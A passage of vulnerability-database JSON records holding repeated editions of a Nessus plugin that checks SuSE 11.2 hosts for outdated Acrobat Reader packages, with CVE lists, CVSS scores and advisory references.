cpu:\"i586\", reference:\"acroread-9.5.5-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-cmaps-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-ja-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-ko-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-cmaps-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-ko-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.4.6-0.4.3.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "SuSE 11.2 Security Update : Acrobat Reader (SAT Patch Number 7734)", "type": "nessus", "viewCount": 4}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-10-29T13:34:11"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko", "p-cpe:/a:novell:suse_linux:11:acroread-cmaps", "p-cpe:/a:novell:suse_linux:11:acroread", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW"], "cvelist": ["CVE-2013-2718", "CVE-2013-2733", "CVE-2013-2724", "CVE-2013-2731", "CVE-2013-2725", "CVE-2013-2721", "CVE-2013-2723", "CVE-2013-2722", "CVE-2013-2720", "CVE-2013-2550", "CVE-2013-3339", "CVE-2013-2737", "CVE-2013-2734", "CVE-2013-2719", "CVE-2013-2735", "CVE-2013-2736", "CVE-2013-3341", "CVE-2013-2726", "CVE-2013-2729", "CVE-2013-2727", "CVE-2013-3337", "CVE-2013-3342", "CVE-2013-2732", "CVE-2013-2730", "CVE-2013-2549", "CVE-2013-3338", "CVE-2013-3340"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Acrobat Reader has been updated to version 9.5.5.\n\nThe Adobe Advisory can be found at:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\nThese updates resolve :\n\n - memory corruption vulnerabilities that could lead to code execution. (CVE-2013-2718 / CVE-2013-2719 / CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 / CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 / CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 / CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 / CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 / CVE-2013-3341)\n\n - an integer underflow vulnerability that could lead to code execution. (CVE-2013-2549)\n\n - a use-after-free vulnerability that could lead to a bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - an information leakage issue involving a JavaScript API.\n (CVE-2013-2737)\n\n - a stack overflow vulnerability that could lead to code execution. (CVE-2013-2724)\n\n - buffer overflow vulnerabilities that could lead to code execution. (CVE-2013-2730 / CVE-2013-2733)\n\n - integer overflow vulnerabilities that could lead to code execution. (CVE-2013-2727 / CVE-2013-2729)\n\n - a flaw in the way Reader handles domains that have been blacklisted in the operating system. (CVE-2013-3342)", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "5c2e7d53ba0a50e81d593f22c2df57c21780b906ef9ea2c2c17e9d1e8ec3825e", "hashmap": [{"hash": "b7d964d31ceb19828376c6b29f67ab4f", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3915c269beae984e656e15c5cff71b31", "key": "description"}, {"hash": "9b1fd3436c4d001d02a057ece18c32db", "key": "title"}, {"hash": "dd906d3e06e3de29c2a35454a1d6e8a1", "key": "cvelist"}, {"hash": "6b01ab9924b51f2f50795114abfd2971", "key": "references"}, {"hash": "144314e655908bceed52c4a5fb4a5710", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "20176f54edbcd7032dfea78d1cf309a1", "key": "modified"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c2716a5d83da1721f23778e107a0d6a0", "key": "cpe"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "9a62ae0ed697cbadc7e7a18563be61a7", "key": "published"}, {"hash": "ab6cddd653e5a262cf9792179aafae7f", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=66505", "id": "SUSE_11_ACROREAD-130516.NASL", "lastseen": "2018-08-30T19:32:10", "modified": "2014-06-27T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "66505", "published": "2013-05-19T00:00:00", "references": ["http://support.novell.com/security/cve/CVE-2013-2726.html", "http://support.novell.com/security/cve/CVE-2013-2731.html", "http://support.novell.com/security/cve/CVE-2013-2722.html", "http://support.novell.com/security/cve/CVE-2013-2732.html", "http://support.novell.com/security/cve/CVE-2013-2736.html", "http://support.novell.com/security/cve/CVE-2013-2718.html", "http://support.novell.com/security/cve/CVE-2013-2719.html", "http://support.novell.com/security/cve/CVE-2013-2723.html", "http://support.novell.com/security/cve/CVE-2013-2550.html", "http://support.novell.com/security/cve/CVE-2013-3337.html", "http://support.novell.com/security/cve/CVE-2013-2734.html", "http://support.novell.com/security/cve/CVE-2013-2729.html", "http://support.novell.com/security/cve/CVE-2013-3338.html", "http://support.novell.com/security/cve/CVE-2013-2724.html", "http://support.novell.com/security/cve/CVE-2013-2737.html", "http://support.novell.com/security/cve/CVE-2013-2727.html", "http://support.novell.com/security/cve/CVE-2013-3340.html", "http://support.novell.com/security/cve/CVE-2013-3339.html", "https://bugzilla.novell.com/show_bug.cgi?id=819918", "http://support.novell.com/security/cve/CVE-2013-2730.html", "http://support.novell.com/security/cve/CVE-2013-2720.html", "http://support.novell.com/security/cve/CVE-2013-3341.html", "http://support.novell.com/security/cve/CVE-2013-3342.html", "http://support.novell.com/security/cve/CVE-2013-2549.html", "http://support.novell.com/security/cve/CVE-2013-2735.html", "http://support.novell.com/security/cve/CVE-2013-2733.html", "http://support.novell.com/security/cve/CVE-2013-2721.html", "http://support.novell.com/security/cve/CVE-2013-2725.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66505);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2014/06/27 10:42:17 $\");\n\n script_cve_id(\"CVE-2013-2549\", \"CVE-2013-2550\", \"CVE-2013-2718\", \"CVE-2013-2719\", \"CVE-2013-2720\", \"CVE-2013-2721\", \"CVE-2013-2722\", \"CVE-2013-2723\", \"CVE-2013-2724\", \"CVE-2013-2725\", \"CVE-2013-2726\", \"CVE-2013-2727\", \"CVE-2013-2729\", \"CVE-2013-2730\", \"CVE-2013-2731\", \"CVE-2013-2732\", \"CVE-2013-2733\", \"CVE-2013-2734\", \"CVE-2013-2735\", \"CVE-2013-2736\", \"CVE-2013-2737\", \"CVE-2013-3337\", \"CVE-2013-3338\", \"CVE-2013-3339\", \"CVE-2013-3340\", \"CVE-2013-3341\", \"CVE-2013-3342\");\n\n script_name(english:\"SuSE 11.2 Security Update : Acrobat Reader (SAT Patch Number 7734)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Acrobat Reader has been updated to version 9.5.5.\n\nThe Adobe Advisory can be found at:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\nThese updates resolve :\n\n - memory corruption vulnerabilities that could lead to\n code execution. (CVE-2013-2718 / CVE-2013-2719 /\n CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 /\n CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 /\n CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 /\n CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 /\n CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 /\n CVE-2013-3341)\n\n - an integer underflow vulnerability that could lead to\n code execution. (CVE-2013-2549)\n\n - a use-after-free vulnerability that could lead to a\n bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - an information leakage issue involving a JavaScript API.\n (CVE-2013-2737)\n\n - a stack overflow vulnerability that could lead to code\n execution. (CVE-2013-2724)\n\n - buffer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2730 / CVE-2013-2733)\n\n - integer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2727 / CVE-2013-2729)\n\n - a flaw in the way Reader handles domains that have been\n blacklisted in the operating system. (CVE-2013-3342)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=819918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2549.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2550.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2718.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2719.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2720.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2721.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2722.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2723.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2724.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2725.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2726.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2727.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2729.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2730.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2731.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2732.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2733.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2734.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2735.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2736.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2737.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3337.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3338.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3341.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3342.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 7734.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-9.5.5-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-cmaps-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-ja-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-ko-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-cmaps-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-ko-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.4.6-0.4.3.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "SuSE 11.2 Security Update : Acrobat Reader (SAT Patch Number 7734)", "type": "nessus", "viewCount": 4}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:32:10"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko", "p-cpe:/a:novell:suse_linux:11:acroread-cmaps", "p-cpe:/a:novell:suse_linux:11:acroread", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW"], "cvelist": ["CVE-2013-2718", "CVE-2013-2733", "CVE-2013-2724", "CVE-2013-2731", "CVE-2013-2725", "CVE-2013-2721", "CVE-2013-2723", "CVE-2013-2722", "CVE-2013-2720", "CVE-2013-2550", "CVE-2013-3339", "CVE-2013-2737", "CVE-2013-2734", "CVE-2013-2719", "CVE-2013-2735", "CVE-2013-2736", "CVE-2013-3341", "CVE-2013-2726", "CVE-2013-2729", "CVE-2013-2727", "CVE-2013-3337", "CVE-2013-3342", "CVE-2013-2732", "CVE-2013-2730", "CVE-2013-2549", "CVE-2013-3338", "CVE-2013-3340"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Acrobat Reader has been updated to version 9.5.5.\n\nThe Adobe Advisory can be found at:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\nThese updates resolve :\n\n - memory corruption vulnerabilities that could lead to\n code execution. (CVE-2013-2718 / CVE-2013-2719 /\n CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 /\n CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 /\n CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 /\n CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 /\n CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 /\n CVE-2013-3341)\n\n - an integer underflow vulnerability that could lead to\n code execution. (CVE-2013-2549)\n\n - a use-after-free vulnerability that could lead to a\n bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - an information leakage issue involving a JavaScript API.\n (CVE-2013-2737)\n\n - a stack overflow vulnerability that could lead to code\n execution. (CVE-2013-2724)\n\n - buffer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2730 / CVE-2013-2733)\n\n - integer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2727 / CVE-2013-2729)\n\n - a flaw in the way Reader handles domains that have been\n blacklisted in the operating system. (CVE-2013-3342)", "edition": 5, "enchantments": {"dependencies": {"modified": "2019-01-16T20:16:07", "references": [{"idList": ["OPENVAS:1361412562310803617", "OPENVAS:1361412562310121011", "OPENVAS:1361412562310803616", "OPENVAS:1361412562310803614", "OPENVAS:1361412562310803615", "OPENVAS:1361412562310803613"], "type": "openvas"}, {"idList": ["GENTOO_GLSA-201308-03.NASL", "OPENSUSE-2013-437.NASL", "SUSE_ACROREAD-8571.NASL", "MACOSX_ADOBE_READER_APSB13-15.NASL", "ADOBE_READER_APSB13-15.NASL", "ADOBE_ACROBAT_APSB13-15.NASL", "REDHAT-RHSA-2013-0826.NASL"], "type": "nessus"}, {"idList": ["BINAMUSE:8184F78DBF0ABBE82A496D8C609F4BEA", "BINAMUSE:F9F25FF8A98B0B91A26198BE57648B2E"], "type": "binamuse"}, {"idList": ["KLA10457"], "type": "kaspersky"}, {"idList": ["GLSA-201308-03"], "type": "gentoo"}, {"idList": ["1337DAY-ID-20799"], "type": "zdt"}, {"idList": ["RHSA-2013:0826"], "type": "redhat"}, {"idList": ["SECURITYVULNS:VULN:13174"], "type": "securityvulns"}, {"idList": ["SUSE-SU-2013:0809-1"], "type": "suse"}, {"idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/ADOBE_SANDBOX_ADOBECOLLABSYNC"], "type": "metasploit"}, {"idList": ["THREATPOST:CA0BD9A827AAC3942472B54A5629767D"], "type": "threatpost"}, {"idList": ["PACKETSTORM:121711", "PACKETSTORM:122309"], "type": "packetstorm"}, {"idList": ["CVE-2013-2718", "CVE-2013-2733", "CVE-2013-2724", "CVE-2013-2720", "CVE-2013-2719", "CVE-2013-2735", "CVE-2013-3341", "CVE-2013-3342", "CVE-2013-3338", "CVE-2013-3340"], "type": "cve"}, {"idList": ["EDB-ID:25725", "EDB-ID:26703"], "type": "exploitdb"}, {"idList": ["ZDI-13-106", "ZDI-13-105"], "type": "zdi"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "b5674e96b8a7f92f6c503f7d5ec16b0aa9c0b082767fd6a98f13b22c7998c92c", "hashmap": [{"hash": "b7d964d31ceb19828376c6b29f67ab4f", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9b1fd3436c4d001d02a057ece18c32db", "key": "title"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "dd906d3e06e3de29c2a35454a1d6e8a1", "key": "cvelist"}, {"hash": "6b01ab9924b51f2f50795114abfd2971", "key": "references"}, {"hash": "92d01148407ef452b0f670fc1268092f", "key": "description"}, {"hash": "144314e655908bceed52c4a5fb4a5710", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "20176f54edbcd7032dfea78d1cf309a1", "key": "modified"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c2716a5d83da1721f23778e107a0d6a0", "key": "cpe"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "9a62ae0ed697cbadc7e7a18563be61a7", "key": "published"}, {"hash": "ab6cddd653e5a262cf9792179aafae7f", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=66505", "id": "SUSE_11_ACROREAD-130516.NASL", "lastseen": "2019-01-16T20:16:07", "modified": "2014-06-27T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "66505", "published": "2013-05-19T00:00:00", "references": ["http://support.novell.com/security/cve/CVE-2013-2726.html", "http://support.novell.com/security/cve/CVE-2013-2731.html", "http://support.novell.com/security/cve/CVE-2013-2722.html", "http://support.novell.com/security/cve/CVE-2013-2732.html", "http://support.novell.com/security/cve/CVE-2013-2736.html", "http://support.novell.com/security/cve/CVE-2013-2718.html", "http://support.novell.com/security/cve/CVE-2013-2719.html", "http://support.novell.com/security/cve/CVE-2013-2723.html", "http://support.novell.com/security/cve/CVE-2013-2550.html", "http://support.novell.com/security/cve/CVE-2013-3337.html", "http://support.novell.com/security/cve/CVE-2013-2734.html", "http://support.novell.com/security/cve/CVE-2013-2729.html", "http://support.novell.com/security/cve/CVE-2013-3338.html", "http://support.novell.com/security/cve/CVE-2013-2724.html", "http://support.novell.com/security/cve/CVE-2013-2737.html", "http://support.novell.com/security/cve/CVE-2013-2727.html", "http://support.novell.com/security/cve/CVE-2013-3340.html", "http://support.novell.com/security/cve/CVE-2013-3339.html", "https://bugzilla.novell.com/show_bug.cgi?id=819918", "http://support.novell.com/security/cve/CVE-2013-2730.html", "http://support.novell.com/security/cve/CVE-2013-2720.html", "http://support.novell.com/security/cve/CVE-2013-3341.html", "http://support.novell.com/security/cve/CVE-2013-3342.html", "http://support.novell.com/security/cve/CVE-2013-2549.html", "http://support.novell.com/security/cve/CVE-2013-2735.html", "http://support.novell.com/security/cve/CVE-2013-2733.html", "http://support.novell.com/security/cve/CVE-2013-2721.html", "http://support.novell.com/security/cve/CVE-2013-2725.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66505);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2014/06/27 10:42:17 $\");\n\n script_cve_id(\"CVE-2013-2549\", \"CVE-2013-2550\", \"CVE-2013-2718\", \"CVE-2013-2719\", \"CVE-2013-2720\", \"CVE-2013-2721\", \"CVE-2013-2722\", \"CVE-2013-2723\", \"CVE-2013-2724\", \"CVE-2013-2725\", \"CVE-2013-2726\", \"CVE-2013-2727\", \"CVE-2013-2729\", \"CVE-2013-2730\", \"CVE-2013-2731\", \"CVE-2013-2732\", \"CVE-2013-2733\", \"CVE-2013-2734\", \"CVE-2013-2735\", \"CVE-2013-2736\", \"CVE-2013-2737\", \"CVE-2013-3337\", \"CVE-2013-3338\", \"CVE-2013-3339\", \"CVE-2013-3340\", \"CVE-2013-3341\", \"CVE-2013-3342\");\n\n script_name(english:\"SuSE 11.2 Security Update : Acrobat Reader (SAT Patch Number 7734)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Acrobat Reader has been updated to version 9.5.5.\n\nThe Adobe Advisory can be found at:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\nThese updates resolve :\n\n - memory corruption vulnerabilities that could lead to\n code execution. (CVE-2013-2718 / CVE-2013-2719 /\n CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 /\n CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 /\n CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 /\n CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 /\n CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 /\n CVE-2013-3341)\n\n - an integer underflow vulnerability that could lead to\n code execution. (CVE-2013-2549)\n\n - a use-after-free vulnerability that could lead to a\n bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - an information leakage issue involving a JavaScript API.\n (CVE-2013-2737)\n\n - a stack overflow vulnerability that could lead to code\n execution. (CVE-2013-2724)\n\n - buffer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2730 / CVE-2013-2733)\n\n - integer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2727 / CVE-2013-2729)\n\n - a flaw in the way Reader handles domains that have been\n blacklisted in the operating system. (CVE-2013-3342)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=819918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2549.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2550.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2718.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2719.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2720.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2721.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2722.html\"\n );\n 